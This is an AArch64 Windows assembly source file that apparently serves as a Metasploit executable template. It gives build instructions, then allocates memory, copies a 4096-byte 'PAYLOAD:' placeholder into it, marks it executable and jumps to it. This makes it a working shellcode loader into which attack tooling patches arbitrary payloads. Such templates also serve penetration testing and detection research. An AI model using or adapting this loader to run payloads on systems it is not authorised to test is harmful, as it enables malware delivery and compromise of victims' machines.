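; A minimal AArch64 PE template for Metasploit shellcode
; Author: Alexander 'xaitax' Hagenah
;
; --- Compilation (Microsoft Visual Studio Build Tools) ---
; 1. Assemble:
; armasm64.exe -o template_aarch64_windows.obj template_aarch64_windows.asm
;
; 2. Link:
; LINK.exe template_aarch64_windows.obj /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
;
;
; --- Cross Compilation (Microsoft Visual Studio Build Tools) ---
; 1. Locate Cross Compiler Tools and Libraries
; In this case: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\
; And: C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64
; 2. Assemble:
; "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\armasm64.exe" -o template_aarch64_windows.obj template_aarch64_windows.asm
; 3. Link:
; "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\link.exe" template_aarch64_windows.obj /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64" /MACHINE:ARM64 /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
;
; --- Structure ---
; Syntax: armasm64 (Microsoft ARM assembler). Labels start in column 0;
;         instructions and directives must be indented.
; ABI:    Windows AArch64 (AAPCS64 variant). Integer args in x0-x7,
;         return in x0 (BOOL results are 32-bit, read via w0).
; Entry:  main (linked with /ENTRY:main, /NODEFAULTLIB) never returns:
;         every path ends in ExitProcess, so x19 and x30 are not preserved
;         and no frame record is built.
; Stack:  sp stays 16-byte aligned; the single 16-byte slot holds the
;         DWORD written by VirtualProtect's lpflOldProtect out-parameter.
; Registers:
;   x19 = address of the VirtualAlloc'd buffer, live across the
;         VirtualProtect call (x19 is callee-saved under AAPCS64).
;   x8  = target address for each indirect Win32 call.
;   x0-x3 = scratch / call arguments, w3 = copy-loop byte.
; The whole image is a single READONLY code AREA; the payload placeholder
; lives in that same AREA (not a separate .data section) and is copied
; out to fresh memory before being made executable.

        AREA |.text|, CODE, READONLY

; Import the Win32 functions we need from kernel32.dll
        IMPORT VirtualAlloc
        IMPORT VirtualProtect
        IMPORT ExitProcess

; Define constants for Win32 API calls
SCSIZE          EQU 4096                ; Size of the payload buffer (one page)
MEM_COMMIT      EQU 0x1000              ; VirtualAlloc flAllocationType
PAGE_READWRITE  EQU 0x04                ; Initial protection while copying
PAGE_EXECUTE    EQU 0x10                ; Final protection before executing

; Export the entry point of our program
        EXPORT main

main
        ; Allocate space on the stack for the oldProtection variable (DWORD).
        ; 16 bytes keeps sp 16-byte aligned as the ABI requires.
        sub     sp, sp, #16

        ; --- 1. Allocate executable memory ---
        ; hfRet = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT, PAGE_READWRITE);
        mov     x0, #0                  ; lpAddress = NULL (let the OS choose)
        mov     x1, #SCSIZE             ; dwSize
        mov     x2, #MEM_COMMIT         ; flAllocationType
        mov     x3, #PAGE_READWRITE     ; flProtect
        ldr     x8, =VirtualAlloc
        blr     x8

        ; Check if VirtualAlloc failed (returns NULL). If so, exit.
        cbz     x0, exit_fail

        ; Save the pointer to our new buffer in a non-volatile register
        ; so it survives the VirtualProtect call below.
        mov     x19, x0

        ; --- 2. Copy the payload into the new buffer ---
        ; This is a simple memcpy(dest, src, size). SCSIZE is non-zero,
        ; so the count-then-test loop below always runs at least once.
        mov     x0, x19                 ; x0 = dest = our new buffer
        ldr     x1, =payload_buffer     ; x1 = src = the payload placeholder in this AREA
        mov     x2, #SCSIZE             ; x2 = count
copy_loop
        ldrb    w3, [x1], #1            ; Load byte from src, increment src pointer
        strb    w3, [x0], #1            ; Store byte to dest, increment dest pointer
        subs    x2, x2, #1              ; Decrement counter, set flags
        b.ne    copy_loop               ; Loop if not zero

        ; --- 3. Change memory permissions to executable ---
        ; VirtualProtect(hfRet, SCSIZE, PAGE_EXECUTE, &dwOldProtect);
        mov     x0, x19                 ; x0 = buffer address
        mov     x1, #SCSIZE             ; x1 = size
        mov     x2, #PAGE_EXECUTE       ; x2 = new protection
        mov     x3, sp                  ; x3 = pointer to oldProtection on the stack
        ldr     x8, =VirtualProtect
        blr     x8

        ; VirtualProtect returns a BOOL in w0; FALSE means the buffer is still
        ; PAGE_READWRITE and branching into it would fault. Exit instead.
        cbz     w0, exit_fail

        ; --- 4. Execute the payload ---
        ; Jump to the code we just copied and protected. If it returns,
        ; execution falls through into exit_success.
        blr     x19

exit_success
        ; Shellcode returned, or we are done. Exit cleanly.
        mov     x0, #0                  ; Exit code 0
        ldr     x8, =ExitProcess
        blr     x8

exit_fail
        ; Something went wrong (VirtualAlloc or VirtualProtect failed). Exit with code 1.
        mov     x0, #1                  ; Exit code 1
        ldr     x8, =ExitProcess
        blr     x8

; The buffer where the payload will be located.
; The 'PAYLOAD:' tag must be at the very beginning of this buffer so the
; tooling that fills the template can find it; the tag plus the reserved
; space total exactly SCSIZE bytes, matching the copy length above.
payload_buffer
        DCB     "PAYLOAD:"
        SPACE   SCSIZE - 8              ; Reserve the rest of the 4096 bytes

        END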